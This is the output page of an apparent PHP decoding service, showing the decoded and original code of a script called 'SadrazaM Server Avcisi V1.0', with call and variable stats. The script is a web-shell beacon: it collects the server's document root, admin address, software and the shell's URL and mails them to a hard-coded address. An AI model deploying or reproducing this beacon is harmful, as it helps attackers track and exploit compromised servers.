Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $kime="[email protected]"; $baslik="SadrazaM Server Avcisi V1.0"; $spyhacker..

Decoded Output download

<?php 
$kime="[email protected]"; 
$baslik="SadrazaM Server Avcisi V1.0"; 
$spyhackerz="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."
"; 
$spyhackerz.="Server Admin : ".$_SERVER['SERVER_ADMIN']."
"; 
$spyhackerz.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."
"; 
$spyhackerz.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."
"; 
$spyhackerz.="Avlanan Site : " .$_SERVER['HTTP_HOST']."
"; 
mail($kime, $baslik, $spyhackerz); 
?>

Did this file decode correctly?

Original Code

<?php
$kime="[email protected]";
$baslik="SadrazaM Server Avcisi V1.0";
$spyhackerz="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
$spyhackerz.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$spyhackerz.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$spyhackerz.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$spyhackerz.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($kime, $baslik, $spyhackerz);
?>

Function Calls

mail 1

Variables

$kime [email protected]
$baslik SadrazaM Server Avcisi V1.0
$spyhackerz Dosya Yolu : None Server Admin : None Server isletim siste..

Stats

MD5 b8d870fbd1d700f1bf88e0b20b64988d
Eval Count 0
Decode Time 52 ms